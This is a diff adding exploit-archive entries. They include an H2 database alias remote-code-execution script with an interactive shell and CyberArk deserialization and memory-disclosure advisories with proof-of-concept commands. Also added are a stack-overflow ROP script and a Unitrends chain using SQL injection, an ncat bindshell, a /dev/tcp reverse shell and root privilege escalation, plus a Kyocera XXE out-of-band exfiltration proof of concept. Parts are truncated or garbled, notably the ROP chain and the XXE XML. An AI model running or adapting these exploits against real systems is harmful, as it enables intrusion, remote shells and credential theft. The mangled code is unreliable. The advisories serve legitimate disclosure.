diff --git a/exploits/java/local/44422.py b/exploits/java/local/44422.py new file mode 100755 index 000000000..7deae07b5 --- /dev/null +++ b/exploits/java/local/44422.py @@ -0,0 +1,92 @@ +''' +Exploit Title: H2 Database Alias Abuse +Date: 05/04/2018 +Exploit Author: gambler +Vendor Homepage:www.h2database.com +Software Link: http://www.h2database.com/html/download.html +Version: all versions +Tested on: Linux, Mac OS +''' + +import sys +import argparse +import html +import requests + +# Blogpost about it +# https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html + +def getCookie(host): + url = 'http://{}'.format(host) + r = requests.get(url) + path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('.jsp','.do') + return '{}/{}'.format(url,path) + +def login(url,user,passwd,database): + data = {'language':'en','setting':'Generic+H2+(Embedded)','name':'Generic+H2+(Embedded)','driver':'org.h2.Driver','url':database,'user':user,'password':passwd} + r = requests.post(url,data=data) + if 'Login' in r.text: + return False + return True + +def prepare(url): + cmd = '''CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : ""; }$$;''' + url = url.replace('login','query') + r = requests.post(url,data={'sql':cmd}) + if not 'Syntax error' in r.text: + return url + return False + +def execve(url,cmd): + r = requests.post(url,data={'sql':"CALL EXECVE('{}')".format(cmd)}) + try: + print(html.unescape(r.text.split('')[1].split('')[0].replace('
','\n').replace(' ',' ')).encode('utf-8').decode('utf-8','ignore')) + except Exception as e: + print('Something goes wrong') + print(e) + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + required = parser.add_argument_group('required arguments') + required.add_argument("-H", + "--host", + metavar='127.0.0.1:4336', + help="Specify a host", + required=True) + required.add_argument("-d", + "--database-url", + metavar='jdbc:h2~/test', + default="jdbc:h2~/test", + help="Database URL", + required=False) + required.add_argument("-u", + "--user", + metavar='username', + default="sa", + help="Username to log on H2 Database, default sa", + required=False) + required.add_argument("-p", + "--password", + metavar='password', + default="", + help="Password to log on H2 Database, default None", + required=False) + args = parser.parse_args() + +url = getCookie(args.host) +if login(url,args.user,args.password,args.database_url): + url = prepare(url) + if url: + while 1: + try: + cmd = input('cmdline@ ') + execve(url,cmd) + except KeyboardInterrupt: + print("\nProfessores ensinam, nadadores Nadam e Hackers Hackeiam") + sys.exit(0) + else: + print('ERROR - Inserting Payload') + print("Something goes wrong, exiting...") +else: + print("ERROR - Auth") + print("Something goes wrong, exiting...") \ No newline at end of file diff --git a/exploits/json/webapps/44429.txt b/exploits/json/webapps/44429.txt new file mode 100644 index 000000000..9ce6b6f38 --- /dev/null +++ b/exploits/json/webapps/44429.txt @@ -0,0 +1,220 @@ +Advisory: CyberArk Password Vault Web Access Remote Code Execution + +The CyberArk Password Vault Web Access application uses authentication +tokens which consist of serialized .NET objects. By crafting manipulated +tokens, attackers are able to gain unauthenticated remote code execution +on the web server. + + +Details +======= + +Product: CyberArk Password Vault Web Access +Affected Versions: < 9.9.5, < 9.10, 10.1 +Fixed Versions: 9.9.5, 9.10, 10.2 +Vulnerability Type: Remote Code Execution +Security Risk: high +Vendor URL: https://www.cyberark.com/ +Vendor Status: fixed version released +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-014 +Advisory Status: published +CVE: CVE-2018-9843 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9843 + + +Introduction +============ + +"CyberArk Enterprise Password Vault is designed to secure, rotate and +control access to privileged account credentials based on organizational +policies. A flexible architecture allows organizations to start small +and scale to the largest, most complex IT environments. The solution +protects privileged account credentials used to access the vast majority +of systems." +(from the Enterprise Password Vault Data Sheet [1]) + + +More Details +============ + +The CyberArk Password Vault provides secure storage for credentials. It +may be accessed through various clients which are also provided by +CyberArk. One such client is the CyberArk Password Vault Web Access, a +.NET web application. After logging into the web application with their +credentials, users may access credentials kept in the vault. +Additionally, CyberArk Password Vault Web Access provides a REST API for +programmatic access to the vault. This API is available at an URL +similar to the following: + +https://10.0.0.6/PasswordVault/WebServices/ + +The API provides multiple endpoints with different methods. +Most methods provided by the API require prior authentication. +Consequently, a user's API call must include an authentication token in +an HTTP authorization header. Tokens may be generated by calling a +dedicated "Logon" API method. + +Analysis of this token by RedTeam Pentesting revealed, that it consists +of a base64 encoded, serialized .NET object of the type +"CyberArk.Services.Web.SessionIdentifiers". This class consists of four +string attributes which hold information about a user's session. The +integrity of the serialized data is not protected. Therefore, attackers +may send arbitrary .NET objects to the API in the authorization header. +By leveraging certain gadgets, such as the ones provided by +ysoserial.net [2], attackers may execute arbitrary code in the context +of the web application. + + +Proof of Concept +================ + +First, a malicious serialized .NET object is created. Here the +"TypeConfuseDelegate" gadget of ysoserial.net is used to execute the +"ping" command: + +------------------------------------------------------------------------ +$ ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 \ + -c "ping 10.0.0.19" > execute-ping.txt + +$ cat execute-ping.txt +AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVy +ZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3Rl +bS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2Nv +cmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2Vu +PWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwAD +AAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtb +U3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0 +cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIA +AAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29t +cGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3Vs +dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19j +b21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAA +AAIAAAAGBgAAABEvYyBwaW5nIDEwLjAuMC4xOQYHAAAAA2NtZAQFAAAAIlN5c3RlbS5EZWxl +Z2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMD +AzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lz +dGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJl +ZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAE +CAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkH +AAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBl +TmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl +cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tT +eXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRy +YWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBt +c2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRv +a2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lz +dGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49 +Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3Vs +dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAASVN5 +c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2Vu +PWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAA +BVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXph +dGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpT +aWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5U +eXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBT +dGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9z +dGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoB +CgAAAAkAAAAGFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZW0uU3RyaW5nBhkAAAArSW50 +MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5J +bnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgA +AAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwg +VmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1 +YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL +------------------------------------------------------------------------ + +Next, an API call is invoked which includes the malicious .NET object in +its authorization header. This is done with cURL [3] as follows: + +------------------------------------------------------------------------ +$ curl -s -X GET -k \ + --url 'https://10.0.0.6/PasswordVault/WebServices/PIMServices.svc/'\ + 'Applications/?Location=\&IncludeSublocations=true' \ + --header "authorization: $(cat execute-ping.txt)" \ + --header 'content-type: application/json' +------------------------------------------------------------------------ + +Simultaneously, tcpdump [4] is invoked on the host 10.0.0.19 to listen +for ICMP packets originating from the web server: + +------------------------------------------------------------------------ +$ sudo tcpdump -i enp0s25 icmp +tcpdump: verbose output suppressed[...] +listening on enp0s25[...] + +IP 10.0.0.6 > 10.0.0.19: ICMP echo request, id 1, seq 6, length 40 +IP 10.0.0.19 > 10.0.0.6: ICMP echo reply, id 1, seq 6, length 40 +------------------------------------------------------------------------ + +The fact that ICMP packets are received from the web server, indicates +that attacker-controlled code was executed. + + +Workaround +========== + +Disable any access to the API at the route /PasswordVault/WebServices. + + +Fix +=== + +Upgrade CyberArk Password Vault Web Access to version 9.9.5, 9.10 or +10.2. + + +Security Risk +============= + +The risk of this vulnerability is rated as high. Attackers with access +to the PrivateArk Vault Web Access REST API may execute arbitrary code +on the web server. No credentials are required. Attackers gain access to +the system with the privileges of the web application. Consequently, +such access may be used to backdoor the web application and compromise +further accounts and credentials. Additionally, attackers may pivot from +the web server to attack the vault directly. + + +Timeline +======== + +2017-11-24 Vulnerability identified +2018-01-22 Customer approved disclosure to vendor +2018-02-05 Vendor notified +2018-02-28 Vendor released fixed version +2018-04-06 CVE number requested +2018-04-07 CVE number assigned +2018-04-09 Advisory released + + +References +========== + +[1] http://lp.cyberark.com/rs/316-CZP-275/images/ds-enterprise-password-vault-11-15-17.pdf +[2] https://github.com/pwntester/ysoserial.net +[3] https://curl.haxx.se/ +[4] https://www.tcpdump.org/ + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://www.redteam-pentesting.de/jobs/ + +-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/exploits/linux/dos/44428.txt b/exploits/linux/dos/44428.txt new file mode 100644 index 000000000..9d4acc131 --- /dev/null +++ b/exploits/linux/dos/44428.txt @@ -0,0 +1,180 @@ +Advisory: CyberArk Password Vault Memory Disclosure + +Data in the CyberArk Password Vault may be accessed through a proprietary +network protocol. While answering to a client's logon request, the vault +discloses around 50 bytes of its memory to the client. + + +Details +======= + +Product: CyberArk Password Vault +Affected Versions: < 9.7, < 10 +Fixed Versions: 9.7, 10 +Vulnerability Type: Information Disclosure +Security Risk: high +Vendor URL: https://www.cyberark.com/ +Vendor Status: fixed version released +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-015 +Advisory Status: published +CVE: CVE-2018-9842 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9842 + + +Introduction +============ + +"CyberArk Enterprise Password Vault is designed to secure, rotate and +control access to privileged account credentials based on organizational +policies. A flexible architecture allows organizations to start small +and scale to the largest, most complex IT environments. The solution +protects privileged account credentials used to access the vast majority +of systems." +(from the Enterprise Password Vault Data Sheet [1]) + + +More Details +============ + +The CyberArk Password Vault serves as a database to securely store +credentials. Furthermore, the vault enforces access controls and logs +access to its records. Data stored in the vault may be accessed through +a proprietary network protocol which is usually transmitted over TCP +port 1858. Various clients, such as web applications or command line +tools, are provided by CyberArk to interface with a vault. + +The first message a client sends to the vault is a "Logon" command. +Using a network sniffer, such a message was captured: + +$ xxd logon.bin +00000000: ffff ffff f700 0000 ffff ffff 3d01 0000 ............=... +00000010: 5061 636c 6953 6372 6970 7455 7365 7200 PacliScriptUser. +00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................ +00000030: 0000 0000 0000 0000 0000 0000 0000 0000 ................ +00000040: 0000 0000 0000 0000 0000 0000 0000 0000 ................ +00000050: 0000 0000 0000 0000 0000 0000 0000 0000 ................ +00000060: 0000 0000 0000 0000 0000 0000 0020 2020 ............. +00000070: 20ff ffff ff00 0000 0000 0000 0000 0073 ..............s +00000080: 0000 00ce cece ce00 0000 0000 0000 0000 ................ +00000090: 0000 0000 0000 0030 3d4c 6f67 6f6e fd31 .......0=Logon.1 +000000a0: 3135 3d37 2e32 302e 3930 2e32 38fd 3639 15=7.20.90.28.69 +000000b0: 3d50 fd31 3136 3d30 fd31 3030 3dfd 3231 =P.116=0.100=.21 +000000c0: 373d 59fd 3231 383d 5041 434c 49fd 3231 7=Y.218=PACLI.21 +000000d0: 393d fd33 3137 3d30 fd33 3537 3d30 fd32 9=.317=0.357=0.2 +000000e0: 323d 5061 636c 6953 6372 6970 7455 7365 2=PacliScriptUse +000000f0: 72fd 3336 373d 3330 fd00 00 r.367=30... + +Starting at offset 0x97, a type of remote procedure call can be +identified. In this case, "Logon" is invoked for the user +"PacliScriptUser". This message does not contain any random, +unpredictable data. Therefore, it may be replayed at will once captured. +This can be accomplished using netcat: + +------------------------------------------------------------------------ +$ cat logon.bin | nc -v 10.0.0.5 1858 +------------------------------------------------------------------------ + +RedTeam Pentesting discovered that the message sent by the vault in +response to a "Logon" command contains about 50 bytes of the vault's +memory. + + +Proof of Concept +================ + +To trigger the vulnerability, a previously captured logon message is +sent to the vault using netcat: + +------------------------------------------------------------------------ +$ cat logon.bin | nc -v 10.0.0.5 1858 | xxd +Ncat: Version 7.40 ( https://nmap.org/ncat ) +Ncat: Connected to 10.0.0.5:1858. +Ncat: 251 bytes sent, 273 bytes received in 0.01 seconds. +00000000: e500 0000 0000 0000 3001 0000 5061 636c ........0...Pacl +00000010: 6953 6372 6970 7455 7365 7200 0000 0000 iScriptUser..... +00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................ +00000030: 0000 0000 0000 0000 0000 0000 0000 0000 ................ +00000040: 0000 0000 0000 0000 0000 0000 0000 0000 ................ +00000050: 0000 0000 0000 0000 0000 0000 0000 0000 ................ +00000060: 0000 0000 0000 0000 0000 0000 001e 0200 ................ +00000070: 0078 9c53 6362 0003 7616 0686 ff40 e019 .x.Scb..v....@.. +00000080: e2e8 ec6b 6069 eaaa 1052 9498 579c 985c ...k`i...R..W..\ +00000090: 9299 9fa7 e093 9f0e 248b b333 0b0a 5253 ........$..3..RS +000000a0: 14d2 f28b 144a 8b53 8b14 0212 9373 3283 .....J.S.....s2. +000000b0: 938b 320b 4a42 817c 3d85 a0d4 c4e2 fc3c ..2.JB.|=......< +000000c0: 2b05 a070 6a5e 8942 717e 7276 6a89 4266 +..pj^.Bq~rvj.Bf +000000d0: 3150 20bf 3835 458f 8b61 140c 15c0 08c4 1P .85E..a...... +000000e0: 0063 0e25 c06d 6265 7220 3d20 7661 756c .c.%.mber = vaul +000000f0: 745f 6669 6c65 5f63 6174 6567 6f72 6965 t_file_categorie +00000100: 735f 7265 636f 7264 7300 2968 b8fb aae9 s_records.)h.... +00000110: 62 +------------------------------------------------------------------------ + +Starting at offset 0xe0, the vault discloses a total of 49 bytes of its +memory to the client. + + +Workaround +========== + +None + + +Fix +=== + +Upgrade CyberArk Password Vault to version 9.7 or 10. + + +Security Risk +============= + +This vulnerability is rated as a high risk. Exploitation only requires +network access to a PrivateArk Password Vault. Although each request +only discloses about 50 bytes of memory, sustained exploitation will +likely reveal sensitive information at some point in time. This +critically undermines the primary purpose of the PrivateArk Password +Vault. + + +Timeline +======== + +2017-11-24 Vulnerability identified +2018-01-22 Customer approved disclosure to vendor +2018-02-05 Vendor notified +2018-04-06 CVE number requested +2018-04-07 CVE number assigned +2018-04-09 Advisory released + + +References +========== + +[1] http://lp.cyberark.com/rs/316-CZP-275/images/ds-enterprise-password-vault-11-15-17.pdf + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://www.redteam-pentesting.de/jobs/ + +-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/exploits/linux/local/44426.py b/exploits/linux/local/44426.py new file mode 100755 index 000000000..67e125ee8 --- /dev/null +++ b/exploits/linux/local/44426.py @@ -0,0 +1,123 @@ +# Exploit Author: Juan Sacco - http://exploitpack.com +# +# Tested on: Kali i686 GNU/Linux +# +# Description: PMS 0.42 is prone to a local unauthenticated stack-based overflow +# The vulnerability is due to an unproper filter of user supplied input while reading +# the configuration file and parsing the malicious crafted values. +# +# 0004| 0xbfffe6c4 --> 0x445b91 (": could not open file.\n") +# 0008| 0xbfffe6c8 --> 0xbfffe720 ("Didn't find configuration file ", 'A' ...) +# 0012| 0xbfffe6cc --> 0xbfffe6f8 --> 0x736e6f00 ('') +# +# Program: PMS 0.42 Practical Music Search, an MPD client +# PMS is an ncurses based client for Music Player Daemon. +# Vendor homepage: https://pms.sourceforge.net +# Kali Filename: pool/main/p/pms/pms_0.42-1+b2_i386.deb +# +# CANARY : disabled +# FORTIFY : disabled +# NX : ENABLED +# PIE : disabled +# RELRO : Partial +# +#0000| 0xbfffe6c0 --> 0x4592a0 --> 0x45f870 --> 0x4 +#0004| 0xbfffe6c4 --> 0x445b91 (": could not open file.\n") +#0008| 0xbfffe6c8 --> 0xbfffe720 ("Didn't find configuration file ", 'A' ...) +#0012| 0xbfffe6cc --> 0xbfffe6f8 --> 0x736e6f00 ('') +#0016| 0xbfffe6d0 --> 0x4637ef ("german") +#0020| 0xbfffe6d4 --> 0x4637f6 ("de_DE.ISO-8859-1") +#0024| 0xbfffe6d8 --> 0x46adb0 ("AAAA\240\312F") +#0028| 0xbfffe6dc ("2018-04-04 06:57:58") +#Legend: code, data, rodata, value +#Stopped reason: SIGSEGV +#0x0042f6c6 in Pms::log (this=, verbosity=, code=0x41414141, format=) at src/pms.cpp:982 +#982 if (!disp && verbosity < MSG_DEBUG) +#gdb-peda$ backtrace +#0 0x0042f6c6 in Pms::log (this=, verbosity=, code=0x41414141, format=) at src/pms.cpp:982 +#1 0x41414141 in ?? () + +import os, subprocess +from struct import pack + +# rop execve ( bin/sh ) +rop = "A"*1017 # junk +rop += pack(' -c 'touch /tmp/foooooooooooo'" + +parser = OptionParser(usage=usage) +parser.add_option("-r", '--RHOST', dest='rhost', action="store", + help="Target host w/ UNITRENDS UEB installation") +parser.add_option("-l", '--LHOST', dest='lhost', action="store", + help="Host listening for reverse shell connection") +parser.add_option("-p", '--LPORT', dest='lport', action="store", + help="Port on which nc is listening") +parser.add_option("-c", '--cmd', dest='cmd', action="store", + help="Run a custom command, no reverse shell for you.") + +(options, args) = parser.parse_args() + +if options.cmd: + if (options.lhost or options.lport): + parser.error("[!] Options --cmd and [--LHOST||--LPORT] are mututally exclusive.\n") + + elif not options.rhost: + parser.error("[!] No remote host specified.\n") + +elif options.rhost is None or options.lhost is None or options.lport is None: + parser.print_help() + sys.exit(1) + +RHOST = options.rhost +LHOST = options.lhost +LPORT = options.lport +if options.cmd: + cmd = options.cmd +else: + cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT) + +apache_ncat_port = random.randint(4000,5000) + +############################################################################### +# STAGE 1: LOW PRIVE RCE! +# Bypass authentication and run a command as apache. In this case, +# we'll run a netcat bindshell on a random port... +# ncat -lvp 4444 -e /bin/sh +# NB: This is not the part of the process where we're going to run our command. +# We're establishing a reverse shell which will be used later to state a +# privilege escalation payload onto this box. +############################################################################### + +low_priv_cmd = "ncat -lvp {0} -e /bin/sh &".format(str(apache_ncat_port)) +url = '/api/hosts/' + +# Here, a SQLi string overrides the uuid, providing auth bypass. +# We'll need to base64 encode before sending... +auth = base64.b64encode("v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0") + +params = urllib.urlencode({'auth' : auth}) + +params = """{{"name":"bbb","ip":"10.0.0.200'\\"`0&{0}`'"}}""".format(low_priv_cmd) + +headers = {'Host' : RHOST, + 'Content-Type' : 'application/json', + 'X-Requested-With' : 'XMLHttpRequest', + 'AuthToken' : auth } + +# Establish an HTTPS connection and send the payload. +conn = httplib.HTTPSConnection(RHOST, 443) +conn.set_debuglevel(0) + +print "[+] Sending payload to remote host [https://{0}]".format(RHOST) +print "[+] opening low-priv bindshell w/ the following command:" +print "[+] {0}".format(low_priv_cmd) + +conn.request("POST", url, params, headers=headers) +r1 = conn.getresponse() + +r1.close() + +############################################################################### +# STAGE 2: MOVE THE PRIVESC ONTO THE REMOTE BOX! +# The local root RCE exploit below will be printf'd into a file in /tmp +# NB: your command of choice has been inserted into this exploit. +############################################################################### + +priv_esc_text = """ + +import socket +import binascii +import struct +import time +import sys +from optparse import OptionParser + +# Parse command line args: +usage = "Usage: %prog -c 'touch /tmp/foooooooooooo'" + +parser = OptionParser(usage=usage) +parser.add_option("-c", '--cmd', dest='cmd', action="store", + help="Run a custom command, no reverse shell for you.") +parser.add_option("-x", '--xinetd', dest='xinetd', action="store", + type="int", default=1743, + help="port on which xinetd is running (default: 1743)") + +(options, args) = parser.parse_args() + +RHOST = '127.0.0.1' +XINETDPORT = options.xinetd +cmd = options.cmd + +def recv_timeout(the_socket,timeout=2): + the_socket.setblocking(0) + total_data=[];data='';begin=time.time() + while 1: + #if you got some data, then break after wait sec + if total_data and time.time()-begin>timeout: + break + #if you got no data at all, wait a little longer + elif time.time()-begin>timeout*2: + break + try: + data=the_socket.recv(8192) + if data: + total_data.append(data) + begin=time.time() + else: + time.sleep(0.1) + except: + pass + return ''.join(total_data) + +print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT)) + +try: + s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s1.connect((RHOST,XINETDPORT)) +except: + print "[!] Failed to connect!" + exit() + +data = s1.recv(4096) +bpd_port = int(data[-8:-3]) + +try: + pass + s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s2.connect((RHOST, bpd_port)) +except: + print "[!] Failed to connect!" + s1.close() + exit() + +print "[+] Connected! Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT)) +print "[+] '{0}'".format(cmd) + +cmd_len = chr(len(cmd) + 3) +packet_len = chr(len(cmd) + 23) + +packet = '\\xa5\\x52\\x00\\x2d' +packet += '\\x00' * 3 +packet += packet_len +packet += '\\x00' * 3 +packet += '\\x01' +packet += '\\x00' * 3 +packet += '\\x4c' +packet += '\\x00' * 3 +packet += cmd_len +packet += cmd +packet += '\\x00' * 3 + +s1.send(packet) + +data = recv_timeout(s2) + +print data + +s1.close() +#s2.close() + +""" + +s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +pe_filename = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(16)) +pe_filename += ".py" + +print "[+] Connecting to ncat bindshell at {0}:{1}.".format(RHOST, str(apache_ncat_port)) +try: + s2.connect((RHOST,apache_ncat_port)) +except Exception as e: + print "[!] something's wrong with %s:%d. Exception is %s" % (address, port, e) + exit() + +print "[+] Transfering privesc script to remote host..." +for line in priv_esc_text.split('\n'): + line = base64.b64encode(line+'\n') + ft_cmd = "echo " + line + " | base64 -d >> /tmp/{0}\n".format(pe_filename) + + s2.send(ft_cmd) + +print "[+] Executing command:" +print "[+] '{0}'".format(cmd) +high_priv_cmd = "python /tmp/{0} -c '{1}'\n".format(pe_filename, cmd) +s2.send(high_priv_cmd) +print "[+] Cleaning up, removing remote privesc script." +cleanup_cmd = "rm /tmp/{0}\n".format(pe_filename) +s2.send(cleanup_cmd) + +print "[+] We did it! :D" +s2.close() \ No newline at end of file diff --git a/exploits/linux/webapps/44430.txt b/exploits/linux/webapps/44430.txt new file mode 100644 index 000000000..b77b59c8b --- /dev/null +++ b/exploits/linux/webapps/44430.txt @@ -0,0 +1,62 @@ +#Vendor: KYOCERA Corporation +#Product https://global.kyocera.com +#Affected version: 3.4.0906 +# +#Summary: KYOCERA Net Admin is Kyocera's unified +#device management software that uses a web-based +#platform to give network administrators easy and +#uncomplicated control to handle a fleet for up to +#10,000 devices. Tasks that used to require multiple +#programs or walking to each printer can now be +#accomplished in a single, fast and modern environment. +# +#Desc: KYOCERA Multi-Set Template Editor (part of Net +#Admin) suffers from an unauthenticated XML External Entity +#(XXE) injection vulnerability using the DTD parameter +#entities technique resulting in disclosure and retrieval +#of arbitrary data from the affected node via out-of-band +#(OOB) channel attack. The vulnerability is triggered when +#input passed to the Multi-Set Template Editor (kmmted.exe) +#called by the ActiveX DLL MultisetTemplateEditorActiveXComponent.dll +#is not sanitized while parsing a 5.x Multi-Set template XML +#file. +# +#Tested on: Microsoft Windows 7 Professional SP1 (EN) +# Apache Tomcat/8.5.15 +# +# +#Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience +# +# +# +#Advisory ID: ZSL-2018-5459 +#Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5459.php +# +# +#28.03.2018 +# +#— +# +# +#Malicious.xml: + + + +%remote; +%root; +%oob;]> + + +Attacker's xxe.xml: + + + "> + + +Data retrieval: + +lqwrm@metalgear:~$ python -m SimpleHTTPServer 7777 +Serving HTTP on 0.0.0.0 port 7777 ... +192.168.1.71 - - [01/Apr/2018 14:36:15] "GET /xxe.xml HTTP/1.1" 200 - +192.168.1.71 - - [01/Apr/2018 14:36:15] "GET 